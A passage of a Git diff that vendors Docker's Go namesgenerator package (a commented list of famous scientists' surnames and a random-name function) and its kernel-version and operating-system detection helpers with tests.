Chemistry in 1935. Daughter of Marie and Pierre Curie. https://en.wikipedia.org/wiki/Ir%C3%A8ne_Joliot-Curie + "joliot", + + // Karen Spärck Jones came up with the concept of inverse document frequency, which is used in most search engines today. https://en.wikipedia.org/wiki/Karen_Sp%C3%A4rck_Jones + "jones", + + // A. P. J. 
Abdul Kalam - is an Indian scientist aka Missile Man of India for his work on the development of ballistic missile and launch vehicle technology - https://en.wikipedia.org/wiki/A._P._J._Abdul_Kalam + "kalam", + + // Susan Kare, created the icons and many of the interface elements for the original Apple Macintosh in the 1980s, and was an original employee of NeXT, working as the Creative Director. https://en.wikipedia.org/wiki/Susan_Kare + "kare", + + // Mary Kenneth Keller, Sister Mary Kenneth Keller became the first American woman to earn a PhD in Computer Science in 1965. https://en.wikipedia.org/wiki/Mary_Kenneth_Keller + "keller", + + // Har Gobind Khorana - Indian-American biochemist who shared the 1968 Nobel Prize for Physiology - https://en.wikipedia.org/wiki/Har_Gobind_Khorana + "khorana", + + // Jack Kilby invented silicone integrated circuits and gave Silicon Valley its name. - https://en.wikipedia.org/wiki/Jack_Kilby + "kilby", + + // Maria Kirch - German astronomer and first woman to discover a comet - https://en.wikipedia.org/wiki/Maria_Margarethe_Kirch + "kirch", + + // Donald Knuth - American computer scientist, author of "The Art of Computer Programming" and creator of the TeX typesetting system. https://en.wikipedia.org/wiki/Donald_Knuth + "knuth", + + // Sophie Kowalevski - Russian mathematician responsible for important original contributions to analysis, differential equations and mechanics - https://en.wikipedia.org/wiki/Sofia_Kovalevskaya + "kowalevski", + + // Marie-Jeanne de Lalande - French astronomer, mathematician and cataloguer of stars - https://en.wikipedia.org/wiki/Marie-Jeanne_de_Lalande + "lalande", + + // Hedy Lamarr - Actress and inventor. The principles of her work are now incorporated into modern Wi-Fi, CDMA and Bluetooth technology. https://en.wikipedia.org/wiki/Hedy_Lamarr + "lamarr", + + // Leslie B. Lamport - American computer scientist. 
Lamport is best known for his seminal work in distributed systems and was the winner of the 2013 Turing Award. https://en.wikipedia.org/wiki/Leslie_Lamport + "lamport", + + // Mary Leakey - British paleoanthropologist who discovered the first fossilized Proconsul skull - https://en.wikipedia.org/wiki/Mary_Leakey + "leakey", + + // Henrietta Swan Leavitt - she was an American astronomer who discovered the relation between the luminosity and the period of Cepheid variable stars. https://en.wikipedia.org/wiki/Henrietta_Swan_Leavitt + "leavitt", + + //Daniel Lewin - Mathematician, Akamai co-founder, soldier, 9/11 victim-- Developed optimization techniques for routing traffic on the internet. Died attempting to stop the 9-11 hijackers. https://en.wikipedia.org/wiki/Daniel_Lewin + "lewin", + + // Ruth Lichterman - one of the original programmers of the ENIAC. https://en.wikipedia.org/wiki/ENIAC - https://en.wikipedia.org/wiki/Ruth_Teitelbaum + "lichterman", + + // Barbara Liskov - co-developed the Liskov substitution principle. Liskov was also the winner of the Turing Prize in 2008. - https://en.wikipedia.org/wiki/Barbara_Liskov + "liskov", + + // Ada Lovelace invented the first algorithm. 
https://en.wikipedia.org/wiki/Ada_Lovelace (thanks James Turnbull) + "lovelace", + + // Auguste and Louis Lumière - the first filmmakers in history - https://en.wikipedia.org/wiki/Auguste_and_Louis_Lumi%C3%A8re + "lumiere", + + // Mahavira - Ancient Indian mathematician during 9th century AD who discovered basic algebraic identities - https://en.wikipedia.org/wiki/Mah%C4%81v%C4%ABra_(mathematician) + "mahavira", + + // Maria Mayer - American theoretical physicist and Nobel laureate in Physics for proposing the nuclear shell model of the atomic nucleus - https://en.wikipedia.org/wiki/Maria_Mayer + "mayer", + + // John McCarthy invented LISP: https://en.wikipedia.org/wiki/John_McCarthy_(computer_scientist) + "mccarthy", + + // Barbara McClintock - a distinguished American cytogeneticist, 1983 Nobel Laureate in Physiology or Medicine for discovering transposons. https://en.wikipedia.org/wiki/Barbara_McClintock + "mcclintock", + + // Malcolm McLean invented the modern shipping container: https://en.wikipedia.org/wiki/Malcom_McLean + "mclean", + + // Kay McNulty - one of the original programmers of the ENIAC. https://en.wikipedia.org/wiki/ENIAC - https://en.wikipedia.org/wiki/Kathleen_Antonelli + "mcnulty", + + // Lise Meitner - Austrian/Swedish physicist who was involved in the discovery of nuclear fission. The element meitnerium is named after her - https://en.wikipedia.org/wiki/Lise_Meitner + "meitner", + + // Carla Meninsky, was the game designer and programmer for Atari 2600 games Dodge 'Em and Warlords. https://en.wikipedia.org/wiki/Carla_Meninsky + "meninsky", + + // Johanna Mestorf - German prehistoric archaeologist and first female museum director in Germany - https://en.wikipedia.org/wiki/Johanna_Mestorf + "mestorf", + + // Marvin Minsky - Pioneer in Artificial Intelligence, co-founder of the MIT's AI Lab, won the Turing Award in 1969. 
https://en.wikipedia.org/wiki/Marvin_Minsky + "minsky", + + // Maryam Mirzakhani - an Iranian mathematician and the first woman to win the Fields Medal. https://en.wikipedia.org/wiki/Maryam_Mirzakhani + "mirzakhani", + + // Samuel Morse - contributed to the invention of a single-wire telegraph system based on European telegraphs and was a co-developer of the Morse code - https://en.wikipedia.org/wiki/Samuel_Morse + "morse", + + // Ian Murdock - founder of the Debian project - https://en.wikipedia.org/wiki/Ian_Murdock + "murdock", + + // Isaac Newton invented classic mechanics and modern optics. https://en.wikipedia.org/wiki/Isaac_Newton + "newton", + + // Florence Nightingale, more prominently known as a nurse, was also the first female member of the Royal Statistical Society and a pioneer in statistical graphics https://en.wikipedia.org/wiki/Florence_Nightingale#Statistics_and_sanitary_reform + "nightingale", + + // Alfred Nobel - a Swedish chemist, engineer, innovator, and armaments manufacturer (inventor of dynamite) - https://en.wikipedia.org/wiki/Alfred_Nobel + "nobel", + + // Emmy Noether, German mathematician. Noether's Theorem is named after her. https://en.wikipedia.org/wiki/Emmy_Noether + "noether", + + // Poppy Northcutt. Poppy Northcutt was the first woman to work as part of NASA’s Mission Control. http://www.businessinsider.com/poppy-northcutt-helped-apollo-astronauts-2014-12?op=1 + "northcutt", + + // Robert Noyce invented silicone integrated circuits and gave Silicon Valley its name. - https://en.wikipedia.org/wiki/Robert_Noyce + "noyce", + + // Panini - Ancient Indian linguist and grammarian from 4th century CE who worked on the world's first formal system - https://en.wikipedia.org/wiki/P%C4%81%E1%B9%87ini#Comparison_with_modern_formal_systems + "panini", + + // Ambroise Pare invented modern surgery. https://en.wikipedia.org/wiki/Ambroise_Par%C3%A9 + "pare", + + // Louis Pasteur discovered vaccination, fermentation and pasteurization. 
https://en.wikipedia.org/wiki/Louis_Pasteur. + "pasteur", + + // Cecilia Payne-Gaposchkin was an astronomer and astrophysicist who, in 1925, proposed in her Ph.D. thesis an explanation for the composition of stars in terms of the relative abundances of hydrogen and helium. https://en.wikipedia.org/wiki/Cecilia_Payne-Gaposchkin + "payne", + + // Radia Perlman is a software designer and network engineer and most famous for her invention of the spanning-tree protocol (STP). https://en.wikipedia.org/wiki/Radia_Perlman + "perlman", + + // Rob Pike was a key contributor to Unix, Plan 9, the X graphic system, utf-8, and the Go programming language. https://en.wikipedia.org/wiki/Rob_Pike + "pike", + + // Henri Poincaré made fundamental contributions in several fields of mathematics. https://en.wikipedia.org/wiki/Henri_Poincar%C3%A9 + "poincare", + + // Laura Poitras is a director and producer whose work, made possible by open source crypto tools, advances the causes of truth and freedom of information by reporting disclosures by whistleblowers such as Edward Snowden. https://en.wikipedia.org/wiki/Laura_Poitras + "poitras", + + // Claudius Ptolemy - a Greco-Egyptian writer of Alexandria, known as a mathematician, astronomer, geographer, astrologer, and poet of a single epigram in the Greek Anthology - https://en.wikipedia.org/wiki/Ptolemy + "ptolemy", + + // C. V. Raman - Indian physicist who won the Nobel Prize in 1930 for proposing the Raman effect. - https://en.wikipedia.org/wiki/C._V._Raman + "raman", + + // Srinivasa Ramanujan - Indian mathematician and autodidact who made extraordinary contributions to mathematical analysis, number theory, infinite series, and continued fractions. - https://en.wikipedia.org/wiki/Srinivasa_Ramanujan + "ramanujan", + + // Sally Kristen Ride was an American physicist and astronaut. She was the first American woman in space, and the youngest American astronaut. 
https://en.wikipedia.org/wiki/Sally_Ride + "ride", + + // Rita Levi-Montalcini - Won Nobel Prize in Physiology or Medicine jointly with colleague Stanley Cohen for the discovery of nerve growth factor (https://en.wikipedia.org/wiki/Rita_Levi-Montalcini) + "montalcini", + + // Dennis Ritchie - co-creator of UNIX and the C programming language. - https://en.wikipedia.org/wiki/Dennis_Ritchie + "ritchie", + + // Wilhelm Conrad Röntgen - German physicist who was awarded the first Nobel Prize in Physics in 1901 for the discovery of X-rays (Röntgen rays). https://en.wikipedia.org/wiki/Wilhelm_R%C3%B6ntgen + "roentgen", + + // Rosalind Franklin - British biophysicist and X-ray crystallographer whose research was critical to the understanding of DNA - https://en.wikipedia.org/wiki/Rosalind_Franklin + "rosalind", + + // Meghnad Saha - Indian astrophysicist best known for his development of the Saha equation, used to describe chemical and physical conditions in stars - https://en.wikipedia.org/wiki/Meghnad_Saha + "saha", + + // Jean E. Sammet developed FORMAC, the first widely used computer language for symbolic manipulation of mathematical formulas. https://en.wikipedia.org/wiki/Jean_E._Sammet + "sammet", + + // Carol Shaw - Originally an Atari employee, Carol Shaw is said to be the first female video game designer. https://en.wikipedia.org/wiki/Carol_Shaw_(video_game_designer) + "shaw", + + // Dame Stephanie "Steve" Shirley - Founded a software company in 1962 employing women working from home. https://en.wikipedia.org/wiki/Steve_Shirley + "shirley", + + // William Shockley co-invented the transistor - https://en.wikipedia.org/wiki/William_Shockley + "shockley", + + // Françoise Barré-Sinoussi - French virologist and Nobel Prize Laureate in Physiology or Medicine; her work was fundamental in identifying HIV as the cause of AIDS. https://en.wikipedia.org/wiki/Fran%C3%A7oise_Barr%C3%A9-Sinoussi + "sinoussi", + + // Betty Snyder - one of the original programmers of the ENIAC. 
https://en.wikipedia.org/wiki/ENIAC - https://en.wikipedia.org/wiki/Betty_Holberton + "snyder", + + // Frances Spence - one of the original programmers of the ENIAC. https://en.wikipedia.org/wiki/ENIAC - https://en.wikipedia.org/wiki/Frances_Spence + "spence", + + // Richard Matthew Stallman - the founder of the Free Software movement, the GNU project, the Free Software Foundation, and the League for Programming Freedom. He also invented the concept of copyleft to protect the ideals of this movement, and enshrined this concept in the widely-used GPL (General Public License) for software. https://en.wikiquote.org/wiki/Richard_Stallman + "stallman", + + // Michael Stonebraker is a database research pioneer and architect of Ingres, Postgres, VoltDB and SciDB. Winner of 2014 ACM Turing Award. https://en.wikipedia.org/wiki/Michael_Stonebraker + "stonebraker", + + // Janese Swanson (with others) developed the first of the Carmen Sandiego games. She went on to found Girl Tech. https://en.wikipedia.org/wiki/Janese_Swanson + "swanson", + + // Aaron Swartz was influential in creating RSS, Markdown, Creative Commons, Reddit, and much of the internet as we know it today. He was devoted to freedom of information on the web. https://en.wikiquote.org/wiki/Aaron_Swartz + "swartz", + + // Bertha Swirles was a theoretical physicist who made a number of contributions to early quantum theory. https://en.wikipedia.org/wiki/Bertha_Swirles + "swirles", + + // Nikola Tesla invented the AC electric system and every gadget ever used by a James Bond villain. https://en.wikipedia.org/wiki/Nikola_Tesla + "tesla", + + // Ken Thompson - co-creator of UNIX and the C programming language - https://en.wikipedia.org/wiki/Ken_Thompson + "thompson", + + // Linus Torvalds invented Linux and Git. https://en.wikipedia.org/wiki/Linus_Torvalds + "torvalds", + + // Alan Turing was a founding father of computer science. https://en.wikipedia.org/wiki/Alan_Turing. 
+ "turing", + + // Varahamihira - Ancient Indian mathematician who discovered trigonometric formulae during 505-587 CE - https://en.wikipedia.org/wiki/Var%C4%81hamihira#Contributions + "varahamihira", + + // Sir Mokshagundam Visvesvaraya - is a notable Indian engineer. He is a recipient of the Indian Republic's highest honour, the Bharat Ratna, in 1955. On his birthday, 15 September is celebrated as Engineer's Day in India in his memory - https://en.wikipedia.org/wiki/Visvesvaraya + "visvesvaraya", + + // Christiane Nüsslein-Volhard - German biologist, won Nobel Prize in Physiology or Medicine in 1995 for research on the genetic control of embryonic development. https://en.wikipedia.org/wiki/Christiane_N%C3%BCsslein-Volhard + "volhard", + + // Marlyn Wescoff - one of the original programmers of the ENIAC. https://en.wikipedia.org/wiki/ENIAC - https://en.wikipedia.org/wiki/Marlyn_Meltzer + "wescoff", + + // Andrew Wiles - Notable British mathematician who proved the enigmatic Fermat's Last Theorem - https://en.wikipedia.org/wiki/Andrew_Wiles + "wiles", + + // Roberta Williams, did pioneering work in graphical adventure games for personal computers, particularly the King's Quest series. https://en.wikipedia.org/wiki/Roberta_Williams + "williams", + + // Sophie Wilson designed the first Acorn Micro-Computer and the instruction set for ARM processors. https://en.wikipedia.org/wiki/Sophie_Wilson + "wilson", + + // Jeannette Wing - co-developed the Liskov substitution principle. - https://en.wikipedia.org/wiki/Jeannette_Wing + "wing", + + // Steve Wozniak invented the Apple I and Apple II. 
https://en.wikipedia.org/wiki/Steve_Wozniak + "wozniak", + + // The Wright brothers, Orville and Wilbur - credited with inventing and building the world's first successful airplane and making the first controlled, powered and sustained heavier-than-air human flight - https://en.wikipedia.org/wiki/Wright_brothers + "wright", + + // Rosalyn Sussman Yalow - Rosalyn Sussman Yalow was an American medical physicist, and a co-winner of the 1977 Nobel Prize in Physiology or Medicine for development of the radioimmunoassay technique. https://en.wikipedia.org/wiki/Rosalyn_Sussman_Yalow + "yalow", + + // Ada Yonath - an Israeli crystallographer, the first woman from the Middle East to win a Nobel prize in the sciences. https://en.wikipedia.org/wiki/Ada_Yonath + "yonath", + } +) + +// GetRandomName generates a random name from the list of adjectives and surnames in this package +// formatted as "adjective_surname". For example 'focused_turing'. If retry is non-zero, a random +// integer between 0 and 10 will be added to the end of the name, e.g `focused_turing3` +func GetRandomName(retry int) string { + rnd := random.Rand +begin: + name := fmt.Sprintf("%s_%s", left[rnd.Intn(len(left))], right[rnd.Intn(len(right))]) + if name == "boring_wozniak" /* Steve Wozniak is not boring */ { + goto begin + } + + if retry > 0 { + name = fmt.Sprintf("%s%d", name, rnd.Intn(10)) + } + return name +} diff --git a/vendor/github.com/docker/docker/pkg/namesgenerator/names-generator_test.go b/vendor/github.com/docker/docker/pkg/namesgenerator/names-generator_test.go new file mode 100644 index 0000000000..d1a94977d7 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/namesgenerator/names-generator_test.go @@ -0,0 +1,27 @@ +package namesgenerator + +import ( + "strings" + "testing" +) + +func TestNameFormat(t *testing.T) { + name := GetRandomName(0) + if !strings.Contains(name, "_") { + t.Fatalf("Generated name does not contain an underscore") + } + if strings.ContainsAny(name, "0123456789") { + 
t.Fatalf("Generated name contains numbers!")
+	}
+}
+
+func TestNameRetries(t *testing.T) {
+	name := GetRandomName(1)
+	if !strings.Contains(name, "_") {
+		t.Fatalf("Generated name does not contain an underscore")
+	}
+	if !strings.ContainsAny(name, "0123456789") {
+		t.Fatalf("Generated name doesn't contain a number")
+	}
+
+}
diff --git a/vendor/github.com/docker/docker/pkg/parsers/kernel/kernel.go b/vendor/github.com/docker/docker/pkg/parsers/kernel/kernel.go
new file mode 100644
index 0000000000..7738fc7411
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/parsers/kernel/kernel.go
@@ -0,0 +1,74 @@
+// +build !windows
+
+// Package kernel provides helper function to get, parse and compare kernel
+// versions for different platforms.
+package kernel
+
+import (
+	"errors"
+	"fmt"
+)
+
+// VersionInfo holds information about the kernel.
+type VersionInfo struct {
+	Kernel int    // Version of the kernel (e.g. 4.1.2-generic -> 4)
+	Major  int    // Major part of the kernel version (e.g. 4.1.2-generic -> 1)
+	Minor  int    // Minor part of the kernel version (e.g. 4.1.2-generic -> 2)
+	Flavor string // Flavor of the kernel version (e.g. 4.1.2-generic -> generic)
+}
+
+func (k *VersionInfo) String() string {
+	return fmt.Sprintf("%d.%d.%d%s", k.Kernel, k.Major, k.Minor, k.Flavor)
+}
+
+// CompareKernelVersion compares two kernel.VersionInfo structs.
+// Returns -1 if a < b, 0 if a == b, 1 if a > b
+func CompareKernelVersion(a, b VersionInfo) int {
+	if a.Kernel < b.Kernel {
+		return -1
+	} else if a.Kernel > b.Kernel {
+		return 1
+	}
+
+	if a.Major < b.Major {
+		return -1
+	} else if a.Major > b.Major {
+		return 1
+	}
+
+	if a.Minor < b.Minor {
+		return -1
+	} else if a.Minor > b.Minor {
+		return 1
+	}
+
+	return 0
+}
+
+// ParseRelease parses a string and creates a VersionInfo based on it.
+func ParseRelease(release string) (*VersionInfo, error) { + var ( + kernel, major, minor, parsed int + flavor, partial string + ) + + // Ignore error from Sscanf to allow an empty flavor. Instead, just + // make sure we got all the version numbers. + parsed, _ = fmt.Sscanf(release, "%d.%d%s", &kernel, &major, &partial) + if parsed < 2 { + return nil, errors.New("Can't parse kernel version " + release) + } + + // sometimes we have 3.12.25-gentoo, but sometimes we just have 3.12-1-amd64 + parsed, _ = fmt.Sscanf(partial, ".%d%s", &minor, &flavor) + if parsed < 1 { + flavor = partial + } + + return &VersionInfo{ + Kernel: kernel, + Major: major, + Minor: minor, + Flavor: flavor, + }, nil +} diff --git a/vendor/github.com/docker/docker/pkg/parsers/kernel/kernel_darwin.go b/vendor/github.com/docker/docker/pkg/parsers/kernel/kernel_darwin.go new file mode 100644 index 0000000000..71f205b285 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/parsers/kernel/kernel_darwin.go @@ -0,0 +1,56 @@ +// +build darwin + +// Package kernel provides helper function to get, parse and compare kernel +// versions for different platforms. +package kernel + +import ( + "fmt" + "os/exec" + "strings" + + "github.com/mattn/go-shellwords" +) + +// GetKernelVersion gets the current kernel version. 
+func GetKernelVersion() (*VersionInfo, error) { + release, err := getRelease() + if err != nil { + return nil, err + } + + return ParseRelease(release) +} + +// getRelease uses `system_profiler SPSoftwareDataType` to get OSX kernel version +func getRelease() (string, error) { + cmd := exec.Command("system_profiler", "SPSoftwareDataType") + osName, err := cmd.Output() + if err != nil { + return "", err + } + + var release string + data := strings.Split(string(osName), "\n") + for _, line := range data { + if strings.Contains(line, "Kernel Version") { + // It has the format like ' Kernel Version: Darwin 14.5.0' + content := strings.SplitN(line, ":", 2) + if len(content) != 2 { + return "", fmt.Errorf("Kernel Version is invalid") + } + + prettyNames, err := shellwords.Parse(content[1]) + if err != nil { + return "", fmt.Errorf("Kernel Version is invalid: %s", err.Error()) + } + + if len(prettyNames) != 2 { + return "", fmt.Errorf("Kernel Version needs to be 'Darwin x.x.x' ") + } + release = prettyNames[1] + } + } + + return release, nil +} diff --git a/vendor/github.com/docker/docker/pkg/parsers/kernel/kernel_unix.go b/vendor/github.com/docker/docker/pkg/parsers/kernel/kernel_unix.go new file mode 100644 index 0000000000..744d5e1f83 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/parsers/kernel/kernel_unix.go @@ -0,0 +1,45 @@ +// +build linux freebsd solaris + +// Package kernel provides helper function to get, parse and compare kernel +// versions for different platforms. +package kernel + +import ( + "bytes" + + "github.com/Sirupsen/logrus" +) + +// GetKernelVersion gets the current kernel version. 
+func GetKernelVersion() (*VersionInfo, error) { + uts, err := uname() + if err != nil { + return nil, err + } + + release := make([]byte, len(uts.Release)) + + i := 0 + for _, c := range uts.Release { + release[i] = byte(c) + i++ + } + + // Remove the \x00 from the release for Atoi to parse correctly + release = release[:bytes.IndexByte(release, 0)] + + return ParseRelease(string(release)) +} + +// CheckKernelVersion checks if current kernel is newer than (or equal to) +// the given version. +func CheckKernelVersion(k, major, minor int) bool { + if v, err := GetKernelVersion(); err != nil { + logrus.Warnf("error getting kernel version: %s", err) + } else { + if CompareKernelVersion(*v, VersionInfo{Kernel: k, Major: major, Minor: minor}) < 0 { + return false + } + } + return true +} diff --git a/vendor/github.com/docker/docker/pkg/parsers/kernel/kernel_unix_test.go b/vendor/github.com/docker/docker/pkg/parsers/kernel/kernel_unix_test.go new file mode 100644 index 0000000000..dc8c0e307b --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/parsers/kernel/kernel_unix_test.go @@ -0,0 +1,96 @@ +// +build !windows + +package kernel + +import ( + "fmt" + "testing" +) + +func assertParseRelease(t *testing.T, release string, b *VersionInfo, result int) { + var ( + a *VersionInfo + ) + a, _ = ParseRelease(release) + + if r := CompareKernelVersion(*a, *b); r != result { + t.Fatalf("Unexpected kernel version comparison result for (%v,%v). Found %d, expected %d", release, b, r, result) + } + if a.Flavor != b.Flavor { + t.Fatalf("Unexpected parsed kernel flavor. 
Found %s, expected %s", a.Flavor, b.Flavor)
+	}
+}
+
+// TestParseRelease tests the ParseRelease() function
+func TestParseRelease(t *testing.T) {
+	assertParseRelease(t, "3.8.0", &VersionInfo{Kernel: 3, Major: 8, Minor: 0}, 0)
+	assertParseRelease(t, "3.4.54.longterm-1", &VersionInfo{Kernel: 3, Major: 4, Minor: 54, Flavor: ".longterm-1"}, 0)
+	assertParseRelease(t, "3.4.54.longterm-1", &VersionInfo{Kernel: 3, Major: 4, Minor: 54, Flavor: ".longterm-1"}, 0)
+	assertParseRelease(t, "3.8.0-19-generic", &VersionInfo{Kernel: 3, Major: 8, Minor: 0, Flavor: "-19-generic"}, 0)
+	assertParseRelease(t, "3.12.8tag", &VersionInfo{Kernel: 3, Major: 12, Minor: 8, Flavor: "tag"}, 0)
+	assertParseRelease(t, "3.12-1-amd64", &VersionInfo{Kernel: 3, Major: 12, Minor: 0, Flavor: "-1-amd64"}, 0)
+	assertParseRelease(t, "3.8.0", &VersionInfo{Kernel: 4, Major: 8, Minor: 0}, -1)
+	// Errors
+	invalids := []string{
+		"3",
+		"a",
+		"a.a",
+		"a.a.a-a",
+	}
+	for _, invalid := range invalids {
+		expectedMessage := fmt.Sprintf("Can't parse kernel version %v", invalid)
+		if _, err := ParseRelease(invalid); err == nil || err.Error() != expectedMessage {
+			t.Fatalf("Expected error %q when parsing %q, got %v", expectedMessage, invalid, err)
+		}
+	}
+}
+
+func assertKernelVersion(t *testing.T, a, b VersionInfo, result int) {
+	if r := CompareKernelVersion(a, b); r != result {
+		t.Fatalf("Unexpected kernel version comparison result. 
Found %d, expected %d", r, result) + } +} + +// TestCompareKernelVersion tests the CompareKernelVersion() function +func TestCompareKernelVersion(t *testing.T) { + assertKernelVersion(t, + VersionInfo{Kernel: 3, Major: 8, Minor: 0}, + VersionInfo{Kernel: 3, Major: 8, Minor: 0}, + 0) + assertKernelVersion(t, + VersionInfo{Kernel: 2, Major: 6, Minor: 0}, + VersionInfo{Kernel: 3, Major: 8, Minor: 0}, + -1) + assertKernelVersion(t, + VersionInfo{Kernel: 3, Major: 8, Minor: 0}, + VersionInfo{Kernel: 2, Major: 6, Minor: 0}, + 1) + assertKernelVersion(t, + VersionInfo{Kernel: 3, Major: 8, Minor: 0}, + VersionInfo{Kernel: 3, Major: 8, Minor: 0}, + 0) + assertKernelVersion(t, + VersionInfo{Kernel: 3, Major: 8, Minor: 5}, + VersionInfo{Kernel: 3, Major: 8, Minor: 0}, + 1) + assertKernelVersion(t, + VersionInfo{Kernel: 3, Major: 0, Minor: 20}, + VersionInfo{Kernel: 3, Major: 8, Minor: 0}, + -1) + assertKernelVersion(t, + VersionInfo{Kernel: 3, Major: 7, Minor: 20}, + VersionInfo{Kernel: 3, Major: 8, Minor: 0}, + -1) + assertKernelVersion(t, + VersionInfo{Kernel: 3, Major: 8, Minor: 20}, + VersionInfo{Kernel: 3, Major: 7, Minor: 0}, + 1) + assertKernelVersion(t, + VersionInfo{Kernel: 3, Major: 8, Minor: 20}, + VersionInfo{Kernel: 3, Major: 8, Minor: 0}, + 1) + assertKernelVersion(t, + VersionInfo{Kernel: 3, Major: 8, Minor: 0}, + VersionInfo{Kernel: 3, Major: 8, Minor: 20}, + -1) +} diff --git a/vendor/github.com/docker/docker/pkg/parsers/kernel/kernel_windows.go b/vendor/github.com/docker/docker/pkg/parsers/kernel/kernel_windows.go new file mode 100644 index 0000000000..80fab8ff64 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/parsers/kernel/kernel_windows.go @@ -0,0 +1,69 @@ +// +build windows + +package kernel + +import ( + "fmt" + "syscall" + "unsafe" +) + +// VersionInfo holds information about the kernel. +type VersionInfo struct { + kvi string // Version of the kernel (e.g. 6.1.7601.17592 -> 6) + major int // Major part of the kernel version (e.g. 
6.1.7601.17592 -> 1) + minor int // Minor part of the kernel version (e.g. 6.1.7601.17592 -> 7601) + build int // Build number of the kernel version (e.g. 6.1.7601.17592 -> 17592) +} + +func (k *VersionInfo) String() string { + return fmt.Sprintf("%d.%d %d (%s)", k.major, k.minor, k.build, k.kvi) +} + +// GetKernelVersion gets the current kernel version. +func GetKernelVersion() (*VersionInfo, error) { + + var ( + h syscall.Handle + dwVersion uint32 + err error + ) + + KVI := &VersionInfo{"Unknown", 0, 0, 0} + + if err = syscall.RegOpenKeyEx(syscall.HKEY_LOCAL_MACHINE, + syscall.StringToUTF16Ptr(`SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\`), + 0, + syscall.KEY_READ, + &h); err != nil { + return KVI, err + } + defer syscall.RegCloseKey(h) + + var buf [1 << 10]uint16 + var typ uint32 + n := uint32(len(buf) * 2) // api expects array of bytes, not uint16 + + if err = syscall.RegQueryValueEx(h, + syscall.StringToUTF16Ptr("BuildLabEx"), + nil, + &typ, + (*byte)(unsafe.Pointer(&buf[0])), + &n); err != nil { + return KVI, err + } + + KVI.kvi = syscall.UTF16ToString(buf[:]) + + // Important - docker.exe MUST be manifested for this API to return + // the correct information. + if dwVersion, err = syscall.GetVersion(); err != nil { + return KVI, err + } + + KVI.major = int(dwVersion & 0xFF) + KVI.minor = int((dwVersion & 0XFF00) >> 8) + KVI.build = int((dwVersion & 0xFFFF0000) >> 16) + + return KVI, nil +} diff --git a/vendor/github.com/docker/docker/pkg/parsers/kernel/uname_linux.go b/vendor/github.com/docker/docker/pkg/parsers/kernel/uname_linux.go new file mode 100644 index 0000000000..bb9b32641e --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/parsers/kernel/uname_linux.go @@ -0,0 +1,19 @@ +package kernel + +import ( + "syscall" +) + +// Utsname represents the system name structure. +// It is passthrough for syscall.Utsname in order to make it portable with +// other platforms where it is not available. 
+type Utsname syscall.Utsname + +func uname() (*syscall.Utsname, error) { + uts := &syscall.Utsname{} + + if err := syscall.Uname(uts); err != nil { + return nil, err + } + return uts, nil +} diff --git a/vendor/github.com/docker/docker/pkg/parsers/kernel/uname_solaris.go b/vendor/github.com/docker/docker/pkg/parsers/kernel/uname_solaris.go new file mode 100644 index 0000000000..49370bd3dd --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/parsers/kernel/uname_solaris.go @@ -0,0 +1,14 @@ +package kernel + +import ( + "golang.org/x/sys/unix" +) + +func uname() (*unix.Utsname, error) { + uts := &unix.Utsname{} + + if err := unix.Uname(uts); err != nil { + return nil, err + } + return uts, nil +} diff --git a/vendor/github.com/docker/docker/pkg/parsers/kernel/uname_unsupported.go b/vendor/github.com/docker/docker/pkg/parsers/kernel/uname_unsupported.go new file mode 100644 index 0000000000..1da3f239fa --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/parsers/kernel/uname_unsupported.go @@ -0,0 +1,18 @@ +// +build !linux,!solaris + +package kernel + +import ( + "errors" +) + +// Utsname represents the system name structure. +// It is defined here to make it portable as it is available on linux but not +// on windows. +type Utsname struct { + Release [65]byte +} + +func uname() (*Utsname, error) { + return nil, errors.New("Kernel version detection is available only on linux") +} diff --git a/vendor/github.com/docker/docker/pkg/parsers/operatingsystem/operatingsystem_linux.go b/vendor/github.com/docker/docker/pkg/parsers/operatingsystem/operatingsystem_linux.go new file mode 100644 index 0000000000..e04a3499af --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/parsers/operatingsystem/operatingsystem_linux.go @@ -0,0 +1,77 @@ +// Package operatingsystem provides helper function to get the operating system +// name for different platforms. 
+package operatingsystem + +import ( + "bufio" + "bytes" + "fmt" + "io/ioutil" + "os" + "strings" + + "github.com/mattn/go-shellwords" +) + +var ( + // file to use to detect if the daemon is running in a container + proc1Cgroup = "/proc/1/cgroup" + + // file to check to determine Operating System + etcOsRelease = "/etc/os-release" + + // used by stateless systems like Clear Linux + altOsRelease = "/usr/lib/os-release" +) + +// GetOperatingSystem gets the name of the current operating system. +func GetOperatingSystem() (string, error) { + osReleaseFile, err := os.Open(etcOsRelease) + if err != nil { + if !os.IsNotExist(err) { + return "", fmt.Errorf("Error opening %s: %v", etcOsRelease, err) + } + osReleaseFile, err = os.Open(altOsRelease) + if err != nil { + return "", fmt.Errorf("Error opening %s: %v", altOsRelease, err) + } + } + defer osReleaseFile.Close() + + var prettyName string + scanner := bufio.NewScanner(osReleaseFile) + for scanner.Scan() { + line := scanner.Text() + if strings.HasPrefix(line, "PRETTY_NAME=") { + data := strings.SplitN(line, "=", 2) + prettyNames, err := shellwords.Parse(data[1]) + if err != nil { + return "", fmt.Errorf("PRETTY_NAME is invalid: %s", err.Error()) + } + if len(prettyNames) != 1 { + return "", fmt.Errorf("PRETTY_NAME needs to be enclosed by quotes if they have spaces: %s", data[1]) + } + prettyName = prettyNames[0] + } + } + if prettyName != "" { + return prettyName, nil + } + // If not set, defaults to PRETTY_NAME="Linux" + // c.f. http://www.freedesktop.org/software/systemd/man/os-release.html + return "Linux", nil +} + +// IsContainerized returns true if we are running inside a container. 
